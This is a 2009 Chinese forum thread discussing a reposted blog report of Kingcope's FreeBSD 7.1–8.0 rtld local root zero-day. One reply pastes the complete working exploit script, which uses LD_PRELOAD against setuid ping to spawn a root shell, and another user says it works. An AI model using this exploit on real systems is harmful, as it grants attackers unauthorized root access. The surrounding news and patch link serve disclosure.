FreeBSD爆严重安全漏洞，安全专家称疑是圣诞前的礼物

lbt5210

http://baoz.net/freebsd8-localroot-0day/

在圣诞节即将到来的日子，以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日（0day）漏洞。据Kingcope所说，他长期致力于挖掘FreeBSD系统的本地提权漏洞，终于有幸在近期发现了这个非常低级的本地提权漏洞；这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中，普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛，包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前，我们科普一下著名黑客kingcope。从2007年6月至今，他一共公开了12个安全漏洞（没公开的不知道有多少），其中 FreeBSD和Sun Solaris各两个，微软四个，Oracle、mysql、NcFTPD和nginx各一个，同时他还编写了多个漏洞的攻击代码，例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程，请注意图中的红色部分；我们只要执行名为fbsd8localroot.sh的脚本，就可以轻易的获得root权限。

FreeBSD尚未就该0day漏洞发布安全公告及官方补丁，敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

非官方补丁地址 http://people.freebsd.org/~cperciva/rtld.patch

lhmwzy

正常，哪个系统能没有漏洞？

[ 本帖最后由 lhmwzy 于 2009-12-2 11:53 编辑 ]

ppabc

    8.0 才刚发布 就有漏洞了？？？？？？？？？？

diyself

人家叮很久了吧？

zhengwei_zw

就是，现在才释放出来

测试了。确实可以

ppabc

这个漏洞前提就是 要有一个普通用户权限
然后用这个脚本提权是吧
但是普通用户也不是那么好搞吧？
相对来说还是安全的 :wink:

hyagami

原来是baoz的博客

fender0107401

果然是所好啊，

这个漏洞应该是潜伏很久了。

lsstarboy

把代码复制来了：:mrgreen:

#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include <stdio.h>
main() {
       extern char **environ;
       environ = (char**)malloc(8096);
       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
       execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
       extern char **environ;
       environ=NULL;
       system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

日灰

bsd这玩意还是弄不太明白，如果不是wheel的话也能得到root权限嘛？